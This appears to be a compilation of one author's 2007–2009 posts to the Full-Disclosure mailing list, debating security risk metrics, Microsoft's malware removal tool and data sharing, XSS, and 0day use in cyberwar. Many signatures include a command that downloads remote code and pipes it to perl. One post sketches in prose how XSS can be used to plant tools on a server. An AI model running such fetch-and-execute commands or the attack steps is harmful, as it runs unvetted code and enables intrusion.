Infiltrated Research Group is proud to introduce RMBSS Risk Metrics Budgetary Scoring System. A synergy of best practices frameworks that synchronizes industry known security frameworks for more thorough Risk Assessments and Analysis. The concept was born out of the need for Information Security Managers (CSO's/CIO's/CISO's) to realize value added security metrics. While our initial version is in its preliminary stages, we're confident that our improved methods of security correlation events in an architecture will guarantee proven actionable security results. Infiltrated Research Group =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP Enough research will tend to support your conclusions. - Arthur Bloch A conclusion is the place where you got tired of thinking - Arthur Bloch 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
On Fri, 27 Feb 2009, Thierry Zoller wrote: If we want to arrive at a state where risk can be managed, it needs to be measured. And if we aren't that far in 2009 I pity us all. One of the most difficult tasks in risk management has always been the measurement factorability. Many books have been published, almost all give differing points of view on quantitative, qualitative, theoretical postures and we can continue to puke on the math. Security metrics (which happens to be an excellent book) is probably one of the most insane topics with regards to security management. We can never get to a degree of real world numbers because everyone's view will be different. So let's place this Safari bug for example as a high impact and use CVSS as a guide: AV:N/AC:L/Au:N/C:C/I:C/A:C CVSS Base Score 10 Impact Subscore 10 Exploitability Subscore 10 CVSS Temporal Score 9 CVSS Environmental Score 9.4 Modified Impact Subscore 10 Overall CVSS Score 9.4 Now how can I place this into the equation of my current infrastructure's security posture? No one here uses a MAC let alone Safari for Windows so technically this doesn't affect me. However, from time to time, we may have a vendor come in, get thrown on a network after connecting to a NAC device, at that instance should I revamp the numbers? Surely I'm placed at risk. It's easy to say if we aren't that far in X hell we aren't far enough to have IPv6 fully deployed after so many years let alone for the security community to be able to come up with a definitive risk metric scale. The problem is, who is doing the math - compounded by terms like risk appetite and fuzzy math tricksters. Risk Appetite sorry my stomach is full. It's a horrendous concept. Pick your poisonous organization, ISACA, ISC2, OGC. They will all give you a methodology into measurement practices and almost certainly all can be tweaked like a magician with a slight of hand to make the most extreme exploit look harmless and the most harmless look extreme. By the way, I'm now selling a Risk Management and Scoring tool for $19.99 that will allow you to enter a program and define what you think the risk is. The program will allow you to pick your target: CIO, CEO, CSO. It will then go out and create a custom chart to maximize your budgetary request or downplay a potential threat. What's going on Thierry, Mike. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP Enough research will tend to support your conclusions. - Arthur Bloch A conclusion is the place where you got tired of thinking - Arthur Bloch 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hotel Network Security: A Study of Computer Networks in U.S. Hotels
On Thu, 02 Oct 2008, Josh Ogle wrote: the technology exists to increase a hotel network?s security, a hotel could potentially be considered at fault for not taking the necessary precautions to protect their guests from hackers. FYI, just because the technology exists does not mean hoteliers have to run out and accomodate everyone in deploying these technologies. If employees were trained in the risks associated with technology, many of these technologies would go the way of the dinosaur. Supposing someone made you aware of the danger of logging into a network because of the impact of sniffers. Would you PERSONALLY be cruising random hotspots. If you knew definitively the person who runs the network could see and record everything you did, I'm sure the chances of you picking up any network to surf on would diminish. Many people aren't aware of the dangers and this is the root of the problem. Technology is nothing more than a stepping stone. Corporations have the capabilities (or should have) to protect their assets on a layered approach and instances like this - employees hooking up from a hotel - can be mitigated way before the fact. Its called policy. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, CNDA, CHFI, OSCP A good district attorney can indict a ham sandwich if he wants to ... The accusations harm as much as the convictions ... they're obviously harmful or it wouldn't be news.. - John Carter wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor
On Thu, 08 May 2008, Paul Schmehl wrote: You're comparing apples with oranges. The is precisely the muddying of the waters that J. Oquendo is seeking to stir up emotions. And you know me this well to infer it's stirring up emotions. I call it raising awareness. You have your interpretation of what you read, I have mine. Is yours wrong Paul. You state waa waa waa I ran the tool it did nothing therefore you are wrong J. Oquendo I'm Paul Schmehl! Did you run it on an infected machine Mr. Schmehl. No so please explain how you yourself did not muddy this water. It clearly says that on the download page. It's not Microsoft's fault if you don't bother to read it. It is Microsoft's fault for not being honest period no ifs ands or buts. Please give us your professional correlation of the article. Information obtained from MSRT was used to track botnet hunters in cahoots with another tool. Yes, their web page (I don't see any EULA) states that they don't collect personally identifiable information. Furthermore, the botnet tool is a separate tool. The page also states that after the tool is run, it deletes itself. So, when you are infected with something, the tool will detect and clean it *and* send some information about the infection back to M$. Can you please find this page. I showed you mine show me yours or just STFU for now, otherwise the my cojones are bigger than yours becomes redundant nonsense. EOS -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor
Of course, with the weasel words may have, inadvertently and potential, you can always claim you never really said that, but you know exactly what the reader will take away from that headline - What??? Microsoft installed a backdoor on my computer Microsoft installed a backdoor on my computer Then you make this amazing leap of logic. This is your interpretation my CORRELATION. If it did not obtain info from MSRT how would have MS created the Botnet tool. I'm not making any amazing leaps of anything other then correlation. If they didn't they shouldn't have mentioned it in the article. You don't see any Ferrari mechanics start talking about Ferrari engines in a mechanics article, and next paragraph talk about speed and not correlate it with a Ferraris that would be insanely stupid. Gee Wilbur I don't mean Ferrari I meant a Yugo. So, in one sentence you tie the MSRT to the botnet buster and go from it sends data to it spies on you. Nice try, but you're not fooling anyone except fools. How did I tie anything. Microsoft implies this in their article in MY interpretation. Again, I don't know about you but I've never had the exposure you have to see someone do so. BTW, a backdoor program is something that allows me to access your computer without your knowledge any time I want to, not a program that sends me information whenever you choose to run it *if* you choose to send it. Again, nice try, but you're not fooling anyone except fools and conspiracy theorists. And you're the architect of this definition? I used the Wiki entry: / READ A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device. / END READ I don't know about you but one, I never agreed to share the information with MS in the first place. THEY IMPOSED IT. And your argument about removing it is MOOT. This is my MAIN RANT. ASK ME BEFOREHAND DON'T ASSUME I AM YOUR GUINEA PIG. Does this register logically to anyone else. The argument here isn't about what MS is actually doing with the information, if they told me beforehand I would have the OPTION to provide information. I wouldn't have had it shoved down my throat because Microsoft is trying to assist LEA. You're missing the entire GIST of it. If you understood more about me, you would have known better to label this as theorist or alarmist. Facts are facts. Is MS obtaining info from my machine YES Is MS passing information obtained from my machine to LEA YES. Is it identifiable. YES IP IS USED AS AN IDENTIFIER either way you cut it. I could care less whether or not if they are or aren't using the information. FACT LEA WILL ATTEMPT TO IDENTIFY YOU VIA IP. FACT YOU ARE IDENTIFIED IN THE FORM OF AN IP THE MOMENT YOU CONNECT. You CONNECTED did the packets get there via RFC2549. FACT. Did MS ever notify me they would be sharing information NO. FACT. We could copy and paste until the cows come home. I stand by what I state and at this point its a matter of interpretation. You can infer what you'd like by my FACTS but they are what they are according to what was disclosed by Microsoft NOT ME. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) Experience hath shewn, that even under the best forms (of government) those entrusted with power have, in time, and by slow operations, perverted it into tyranny. Thomas Jefferson wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor
On Wed, 07 May 2008, Paul Schmehl wrote: And that relates to the MSRT how? Relates to MSRT sending your information. It only sends information when it finds something. I never stated it sends all your information all the time. Now you're being silly. You're claiming that *realtime connection information* is included in the data that is sent but without any grounds to do so and despite Microsoft's claims to the contrary. And without any proof. Pick up a dev machine load it with malware, run MSRT, and sniff it. You'll see what it sends and remember LEA uses IP as an identifier bottom line. You might try it some time. Getting the facts beats wild speculation and hyperbole every time. I just installed MSRT on my laptop and ran it while Wireshark was monitoring all external communications. It sent exactly *zero* information to MS. It sent zero information because it did not detect anything malicious. As for paranoia, has nothing to do with paranoia. Facts. Fact 1) Is MS sending information from your machine to them ... Yes Fact 2) If something malicious is detected on your machine will it go to MS. Yes. Fact 3) Will they share information obtained from YOUR machine via YOUR IP address will they share that information with LEA? According to the MS spokesman they will. Fact 4) Can LEA correlate the information sent from your machine to an IP address... Yes. Go back and look at the information MS is obtaining it's in the log file. So looking at Sasser, lets fiddle with this: Quick Scan Results: Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe Found virus: Win32/Sasser.A.worm in regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe Found virus: Win32/Sasser.A.worm in runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe Found virus: Win32/Sasser.A.worm in file://C:\WINDOWS\avserve.exe Quick Scan Removal Results Start 'remove' for regkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe Operation succeeded ! Start 'remove' for runkey://HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\avserve.exe Operation succeeded ! Start 'remove' for file://\\?\C:\WINDOWS\avserve.exe Operation succeeded ! Results Summary: Found Win32/Sasser.A.worm and Removed! Return code: 6 Microsoft Windows Malicious Software Removal Tool Finished On Mon Mar 19 13:15:57 2007 (from there website). Now according to their article and common logic, in their article they stated they obtained samples of the infection to track the CNC of a botnet. How did they get this is up in the air, but with their forced update history, its possible on detection they can actually send avserve.exe right back to themselves. Anyhow, so I create something crafted to implicate you - using my previous analogy of being a botnet CNC owner, my program implicates your network you take the fall. People pull Joe Jobs all the time. Not all of us are consumed by paranoia and unfounded fears. Some of us actually approach security from a rational, intelligent perspective and attempt to mitigate risks to the best of our abilities while accepting the fact that we can't stop every attack. A Joe Job is an unfounded fear? How about poisoning the well. What happens if someone reading this decides to put it to the tests nullifying any verifiable, concrete snapshots with garbage. Then what will be of the tool? e-Garbage truck? I don't consider fantasizing about bogeymen thinking outside the box. Fantasizing has nothing to do with reality. People are paying top dollars in life to screw someone all the time whether its online or not. This is another stupid mechanism someone can use. Its a flawed concept albeit nice idea. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsot DID DISCLOSE potential Backdoor
On Tue, 06 May 2008, Ken Schaefer wrote: I'm not sure the facts in evidence support the conclusions reached here (sorry, not posting inline as I don't want to address each conclusion built upon some other shaky conclusion. From http://support.microsoft.com/kb/890830 == Either I am missing the point of J. Oquendo's post, or the conclusions I think he reaches are speculation rather that established. Cheers Ken Unsure if this made it to the list the first time, therefore I will re-take. Outside of technical quoting I will lay it out in understandable terms. Microsoft DOES NOT NOTIFY THE END USER THAT INFORMATION TAKEN FROM THEIR MACHINE WILL BE FORWARDED TO ANYONE OUTSIDE OF MICROSOFT. This *IS NOT* speculation but fact. Since you provided the link for us, please go back and specify where Microsoft is telling us the information they gather from Windows Malicious Software Removal WILL BE sent to LAW ENFORCEMENT AGENCIES inside or outside the United States. Please read the article and the wording: http://www.pcworld.com/businesscenter/article/145257/microsoft_botnethunting_tool_helps_bust_hackers.html /QUOTED The software vendor is giving law enforcers access to a special tool that keeps tabs on botnets, using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool that ships with Windows. / END QUOTE Please find me anything in the EULA for WMSR tool that specifies they will do as they see fit with data from my machine? Now what's to stop them from using the same principle in the future: We obtained information before, no one cared. RIAA cares to get a baseline of how many Windows users have MP3's. Farfetched? I think not. What happens a-la ATT wiretaps where Microsoft decides to say obtain whatever information they'd like regardless of telling you what they're doing with that information. So you argue... Reporting is optional... It sure is, but what do you think the response would be from MS users if MS stated We will send your information to Law Enforcement agents anywhere... /QUOTED: In February, the S?ret? du Qu?bec used Microsoft's botnet-buster to break up a network that had infected nearly 500,000 computers in 110 countries, according to Captain Frederick Gaudreau, who heads up the provincial police force's cybercrime unit. / END QUOTE Missing the part? Its black and white. If MS wasn't using information (flawed since it's relying on IP) then how did they correlate IP information back to law enforcement... OUTSIDE the United States... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsot DID DISCLOSE potential Backdoor
that there are far too many open WiFi hotspots in the world to conclusively narrow a fact. We have an assumption that an attacker is behind 10.10.10.159. Can we see them? No. All we know is the address. Being I've used a private address, I won't bother diving into but he came from ISP X in Nebraska. Irrelevant. What you have is a fishing expedition. / SNIP For more on this false sense of ID-via-IP: Well, let me ask you you think 171.70.120.60 is. I'll give you a hint; at this instant, there are 72 of us. Here's another question. Whom would you suspect 171.71.241.89 is? At this point in time, I am in Barcelona; if I were home, that would be my address as you would see it, but my address as I would see it would be in 10.32.244.216/29. There might be several hundred people you would see using 171.71.241.89; /END SNIP I implore you to read a NANOG thread http://readlist.com/lists/trapdoor.merit.edu/nanog/6/33246.html Professionals know, IP is an inaccurate identifier so why does it seem that Microsoft along with LEO are relying on this. Makes a great baseline sure, but is certainly ripe for abuse Again, please understand what I am stating, this is not to say that its a horrible idea, its a start, a baseline - but not a definitive measure of determining who is controlling a bot, who created the botnet, etc. Looking at past history, unfortunately you have the tinkerers; so what happens to an up- and-coming security buff who is getting into the field and stumbles upon a botnet. Sure he was moronic to join an irc channel filled with bots, sure he was idiotic in downloading the code for the sake of learning. Fact is he might have. Guess what will happen to him when a Law Enforcement Agency raids his house? Guess what will happen when that agency needs funding for a new uber Cyber(buzzword)Crime fighting department. You guessed it. Hey Up-and-coming security buff... Kiss your terminal goodbye, and from here on out, your dreams of becoming the next Bruce Schneier will be close to non- existent. It happens. Anyhow, re-emphasizing... Shame on Microsoft for forwarding your data without telling you. Shame on Microsoft for not asking you if you wanted to PARTICIPATE in sending data. Shame on Microsoft for not explicitly stating: The data we are sneaking off your computer will be sent to government agencies of our choice. Its a horrible practice and a damaging breach of trust. Their action worries me as a security professional, will they ever scour for data for profit. Why not, no one would notice or care anyway. J. Oquendo sil @ infiltrated dot net -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x3AC173DB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE/Windows blocking Firefox downloads?
Jan Clairmont wrote: Never had a problem with those. Anyone know a quick fix other than re-loading a sane OS? Try sfc /scannow from a command prompt -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?
You need to check your spelling. Libel != Lible Death -- Yes, legally, it is no problem to speak ill of the dead. For example, in James Bamford's The Puzzle Palace, a book about the National Security Agency, a former government employee is called a Russian spy even though he was never convicted of anything other than contempt of court. The family considered a defamation lawsuit, but learned that it was impossible because the subject was dead. In some cases, a libel suit filed by a person who dies may be continued, but relatives of a dead person cannot bring a libel suit. http://www.radford.edu/~wkovarik/class/law/1.5libel.html -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?
Simon Smith wrote: Ok, Big deal I typed it wrong once. More significantly, your interpretation of what I wrote is inaccurate. Why are you supporting the trolls? Did you see any support of any trolls? I stay out of trolling. Besides death is death, its a sad loss but life moves on. People come, people go, had I known him I'd make a comment to no one on a public forum since it wouldn't be the right medium. Maybe flowers or a condolence card to his family would have been my route. I have little time for trolling especially to spit on someone who's not around to defend himself. I've no opinion of JP other then he seemed to be a knowledgeable person unlike many a poster here. I don't play the suck up game either he will be greatly missed. I'm sure his family and friends will miss him and I hope they cherish his memory lest they become robots, as for me, I didn't know him to make a comment. My comment was towards you and your incorrect ASSumption of law. -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Layer 9 Corporation ( D )
secreview wrote: We do take a few points away from Layer 9 because they resell third party hardware and software. We feel that companies who resell third party technologies become bias towards selling those technologies even if a better technology solution exists. This might not stand true for a business that makes such a strong effort to be honest like Layer 9, but it most certainly is true for most IT Security Providers. Where I work we re-sell third party products and its based on an assessment of what the client needs. There is no one size fits all solution. When I contracted at a company I won't mention (one of the top 5 computing companies) we re-sold Juniper Netscreens to migrate out Checkpoint to one of our clients because it fit their need. We could have sold them bigger equipment to accommodate for it at a higher price. You and whomever else your cohorts are need to take a better look at security design as a whole instead of shooting off rambling messages such as these. Let's go back to 1998, 1999 pre @Stake the corporation. One would have cringed at L0pht's site from a CTO perspective. Does that mean you would have belittled them in your (pseudo)security review. Perhaps when you called Layer9 they didn't want to be bothered with your BS. Perhaps somewhere there is on this list and awaited your call. I don't know I don't work for them. We also noticed that Layer 9 seems to be more geared towards offering IT services than Professional IT Security Services. They sell PIX firewalls and discuss services that are designed to help their customers improve the performance of their IT Infrastructure. They do not offer the more advanced IT Security Services. Name me one of the top 20 Fortune 500 companies that doesn't resell these services. You think companies don't farm out work? Based on the little bit of information that we were able to collect about Layer 9, it is our opinion that Layer 9 is a trustworthy company that will only offer services to their customers that they are capable of delivering. We can not comment on the talent or capabilities of Layer 9 as we couldn't find any information related to that. Likewise, we can not comment on the quality of their services. Based on the reviews you guys put out, I take you as serious as I take that Indian kid ockknock whatever the hell his name was. WTF is this idiot talking about. If I were a CSO why would I want to take you serious, why should I take you serious. Let's be logical here. What are your credentials. What certs do you possess, how long have YOU been in the industry, where have you worked, what have YOU done for the security community. Get a real job. -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
SecReview wrote: Nate, Your email was constructive and much appreciated. We'll go over the review a second time and incorporate some of your suggestions. Thank you for taking the time to provide so much good feedback. Hey all, I'd like to get into reviewing security companies as well. Before I do though I'd appreciate it if someone could provide me with information on the differences betweens statistical sampling over judgmental sampling. I wouldn't want to write a review that could affect someone's livelihood without knowing what the differences are between say change management and mitigation management. And to the older security folks on the list keeping quiet (not those between the ages of tenteen and 19): eW91IGNhbiBwYXkgdXMgdG8gd2hvcmUgeW91ciBjb21wYW55Cg== Cheap too! -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
Byron Sonne wrote: In terms of a technically interesting challenge, it sounds about as exciting as picking fights with 10 year olds. Shit man, most of this stuff is more about fooling people than anything. Yawn. I was bored tricking or weaseling passwords out of datacentre employees over the phone 20 years ago. Now I'm supposed to get excited 'cos some retards are doing it over the web? I agree to an extent however I do know some pretty skillful people on all sorts of levels use xss in conjuction with leveraging a network. A safe assumption. In fact, if it's on the web, it's a safe assumption it's crap anyways. Or is that Crap2.0? What's that old adage on assume. Forward facing sites can be leveraged to disclosure other information. E.g., Write an XSS to run commands on the system itself for say a week. Eventually you will see signs of someone logging into said system. Construct an XSS attack to embed the necessary tools to leverage your way into the backbone. Not unlikely a difficult thing to do considering you managed to XSS attack the site in the first place. What you/we see too often on this and other mailing list is stupidity a-la I just XSS and popup up w00t now give me credit! That is not what I consider a hack I consider it stupidity. What would have impressed me would be someone using a curl POST with a proxy, dumping binaries and having those binaries run with the user privileges of the webserver. One misconfigured webserver (chown -Rf root:wheel) and its a wrap. -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) I hear much of people's calling out to punish the guilty, but very few are concerned to clear the innocent. Daniel Defoe http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
Dude VanWinkle wrote: A program installed under false pretenses that will give the author/distributer remote access to the victim machines. Right... Guess those local are not a threat. -JP Vranisaprick is that you -- J. Oquendo SGFA (FW+VPN v4.1) SGFE (FW+VPN v4.1) I hear much of people's calling out to punish the guilty, but very few are concerned to clear the innocent. Daniel Defoe http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Spike in SSH scans
Adrian wrote: Yeah, some of those ips also tried to login on my server as 'mysql' and 'root'. Even my university is part of that crappy botnet. :x ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://atlas.arbor.net/service/tcp/22 +66.0 % as of yesterday. -- J. Oquendo SGFA (FW+VPN v4.1) SGFE (FW+VPN v4.1) I hear much of people's calling out to punish the guilty, but very few are concerned to clear the innocent. Daniel Defoe http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New term RDV is born
[EMAIL PROTECTED] wrote: Two months is still recently. Think about In recent history we invaded Iraq, In recent times terrorism has become more prominent. The real problem here is that 0-day originally meant previously undisclosed vulnerability/exploit. The term lost its usefulness when all the hacker wannabe's started posting I found a 0-day, when what they really had was a *yawn*-we've-been-waiting-18-months-for-vendor-to-fix-day. Which reminds me, I recently found a vulnerability on all open source based systems. Seems like whenever there is a program called sudo installed on the machine - any user can run a command with root privileges on that machine if sudo is properly configured to allow the user to do so. #!/bin/sh # sudUmb echo pwnd sudo shutdown now # insert one million shout outs to etards here J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: PDF pwns Windows
Crispin Cowan wrote: This is a perfectly viable way to produce what amounts to Internet munitions. The recent incident of Estonia Under *Russian Cyber Attack*? http://www.internetnews.com/security/article.php/3678606 is an example of such a network brush war in which possession of such an arsenal would be very useful. Crispin One would presume that governments across the world would have their shares of unpublished exploits but with all the incidences of government networks being compromised, I don't believe this to be the case. What happened in Estonia though was nothing more than a botnet attack on their infrastructure (http://www.informationweek.com/showArticle.jhtml?articleID=199602023) not an 0day attack. 0day's defined as unpublished exploit wouldn't do much in a cyberwarfare theater as country against country as the purpose of such warfare would LIKELY be to disconnect/disrupt communications. In the cases of industrial/country vs. country espionage it might (likely) will be more effective for the long haul but in the short term, 0days will be useless in this type of cyberfight. Think about it logically, you want to disrupt country X's communications, not tap them. You'd want to make sure their physical army had no mechanism to communicate. You'd want to make sure financially you would cripple them. Not worry about injecting some crapware onto a machine for the sake of seeing what their doing. Reconnaissance is usually something done beforehand to mitigate your strategy. Not mitigate what's happening after you possibly sent 1Gb of traffic down a 100Mb pipe. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: PDF pwns Windows
Jason wrote: You present a valid position but fall short of seeing the whole picture. As an attacker, nation state or otherwise, my goal being to cripple communications, 0day is the way to go. Resource exhaustion takes resources, something the 0day can deprive the enemy of. Counterpoint... You're trying to shoot me down with 0day crap: You -- 0day attack -- My Infrastructure Me -- Botnet -- Your infrastructure Never having to consume any resources other than a point and click shoot em up attack, I necessarily won't even have to use my own resources. So shoot away as your network becomes saturated. Knocking out infrastructure with attacks is a far more effective strategy. You can control it's timing, launch it with minimal resources, from anywhere, coordinate it, and be gone before it can be thwarted. The botnet would only serve as cover while the real attack happens. In a strategic war, most countries aim to eliminate supply points and mission critical infrastructure as quickly as possible. In a cyberwarfare situation me personally, I would aim to 1) disrupt/stop via a coordinated attack whether its via a botnet or something perhaps along the lines of a physical cut to a nation's fiber lines. 0day would only serve me afterwards to perhaps maintain covert states of communication. Maybe inject disinformation through crapaganda. Imagine an enemies entire website infrastructure showing tailored news... Would truly serve a purpose AFTER the attack not during. I am more inclined to believe that botnets in use today really only serve as cover, thuggish retribution, and extortion tools, not as effective tools of warfare. No real warfare threat would risk exposing themselves through the use of or construction of a botnet. Luckily for most companies and government, botnets aren't being used for their full potential. And I don't mean potential as in they're a good thing. I could think up a dozen cyberware scenarios in minutes that would cripple countries and businesses. I believe countries, providers and governments should at some point get the picture and perhaps create guidelines to curtail the potential for havoc - imagine hospitals being attacked and mission critical life saving technologies taken offline. J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: PDF pwns Windows
[EMAIL PROTECTED] wrote: But a 0 day vulnerability is meaningless as a definition; it applies to a vulnerability for exactly 24 hours and then is meaningless. ALL vulnerabilities were discovered at some point and had their 24 hours of 0 day fame by your definition. It just does not make sense. Casper Should we now create a new term for the industry +0day or 1day. How about? nowaday -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
